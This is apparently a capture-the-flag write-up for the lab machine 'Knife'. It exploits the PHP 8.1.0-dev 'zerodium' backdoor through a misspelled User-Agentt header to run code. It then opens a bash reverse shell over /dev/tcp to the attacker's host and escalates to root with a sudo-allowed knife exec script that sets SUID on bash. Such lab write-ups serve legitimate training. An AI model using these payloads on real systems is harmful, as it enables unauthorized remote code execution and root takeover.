# Knife ## Port scan ``` PORT STATE SERVICE 22/tcp open ssh 80/tcp open http ``` ### website ![](https://user-images.githubusercontent.com/53917092/119241635-4f676d00-bb2e-11eb-9544-c34da9caa846.png) looking at the site we don't see anything interesting. I tried fuzzing around to find more information but found nothing. so I decided to look at the requests. request: ``` GET /index.php HTTP/1.1 Host: 10.129.109.116 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ``` response ``` HTTP/1.1 200 OK Date: Sat, 22 May 2021 21:45:40 GMT Server: Apache/2.4.41 (Ubuntu) X-Powered-By: PHP/8.1.0-dev Vary: Accept-Encoding Content-Length: 5815 Connection: close Content-Type: text/html; charset=UTF-8 [...] ``` here we have something interesting: the server is running PHP 8.1.0-dev. ``` X-Powered-By: PHP/8.1.0-dev ``` searching about PHP 8.1.0-dev vulnerabilities ![](https://user-images.githubusercontent.com/53917092/119243186-e63a2680-bb3a-11eb-95eb-2ef78be1607f.png) After translating this site we see that in this specific version of php a backdoor was placed (this backdoor was quickly removed in the updates) ![](https://user-images.githubusercontent.com/53917092/119243233-3fa25580-bb3b-11eb-8f49-edb98ea617fd.png) searching more about the backdoor I found this: ![](https://user-images.githubusercontent.com/53917092/119243441-24384a00-bb3d-11eb-984e-06dfe77bdf55.png) this article teaches us how to use this backdoor to execute code and have an RCE ![](https://user-images.githubusercontent.com/53917092/119243476-898c3b00-bb3d-11eb-9045-41031df63283.png) by adding the header "User-Agentt: zerodium" we can execute php code. so our request will be: ``` GET /index.php HTTP/1.1 Host: 10.129.109.116 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 User-Agentt: zerodiumsystem('id'); ``` and we got the response: ``` HTTP/1.1 200 OK Date: Sat, 22 May 2021 23:43:40 GMT Server: Apache/2.4.41 (Ubuntu) X-Powered-By: PHP/8.1.0-dev Vary: Accept-Encoding Content-Length: 5866 Connection: close Content-Type: text/html; charset=UTF-8 uid=1000(james) gid=1000(james) groups=1000(james) [...] ``` worked, we got Remote Code execution ## User open a listener > nc -lvnp 1234 use this header ``` User-Agentt: zerodiumsystem('bash -c "/bin/sh -i >& /dev/tcp/10.10.14.96/1234 0>&1" '); ``` got shell ![](https://user-images.githubusercontent.com/53917092/119244395-af6a0d80-bb46-11eb-8e5e-97de3c96a7f8.png) improving this shell to a tty ``` python3 -c 'import pty;pty.spawn("/bin/bash")' CTRL+Z stty raw -echo; fg export TERM=xterm clear ``` ![](https://user-images.githubusercontent.com/53917092/119244469-71211e00-bb47-11eb-98f2-7db79fcdb7ef.png) ## Privilege Escalation > sudo -l ![](https://user-images.githubusercontent.com/53917092/119245373-463ac800-bb4f-11eb-8461-e38d224d9c8f.png) check this binary > cat /usr/bin/knife ![](https://user-images.githubusercontent.com/53917092/119245628-24424500-bb51-11eb-8257-6cca1c443084.png) looks like a management program written in ruby running this binary > /usr/bin/knife we see that we can run commands ![image](https://user-images.githubusercontent.com/53917092/119246545-d6313f80-bb58-11eb-94cf-dbcac889a9ec.png) I wrote a script that runs a command to make bash runnable as root without a password ``echo '`chmod +s /bin/bash`' > rootscript`` `sudo /usr/bin/knife exec rootscript` now run bash with -p flag > bash -p we got root, just get the root flag ![image](https://user-images.githubusercontent.com/53917092/119246975-64f38b80-bb5c-11eb-9613-dfc8f4faed98.png)